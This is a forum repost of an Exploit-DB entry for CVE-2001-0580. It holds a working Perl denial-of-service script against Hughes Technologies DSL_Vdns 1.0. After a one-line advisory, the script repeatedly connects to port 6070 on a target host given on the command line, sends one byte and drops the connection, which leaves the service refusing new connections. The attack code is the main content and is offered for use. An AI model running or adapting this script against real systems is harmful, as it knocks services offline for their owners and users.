Exploit Hughes Technologies DSL_Vdns 1.0 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20827
Проверка EDB
  1. Пройдено
Автор
NEME-DHC
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2001-0580
Дата публикации
2001-05-07
Код:
source: https://www.securityfocus.com/bid/2700/info

It is possible for a remote user to cause a denial of service on a host running DSL_Vdns. Submitting data to port 6070 and closing the connection before the request is fulfilled, will cause DSL_Vdns to enter a 'Default.Closed' state; therefore, refusing any new connections. 

#!/usr/bin/perl
#
# VDNS.PL - Crashes Virtual DNS Server 1.0
# Written by nemesystm of the DHC
# http://dhcorp.cjb.net - [email protected]
#
####
use Socket;

die "$0 - Stops Virtual DNS Server 1.0.
written by nemesystm of the DHC
http://dhcorp.cjb.net - neme-dhc\@hushmail.com
usage: perl $0 target.com\n" if !defined $ARGV[0];

for ($count = 0; $count <= 3; $count++) {
        $serverIP = inet_aton($ARGV[0]);
        $serverAddr = sockaddr_in(6070, $serverIP);
        socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
        if (connect (CLIENT, $serverAddr)) {
                send (CLIENT, "A", 0);
                close (CLIENT);
        } else { print ("if the number shown is 2, it worked"); die "Can't connect: $count\n"; }
}
 
Источник
www.exploit-db.com

Похожие темы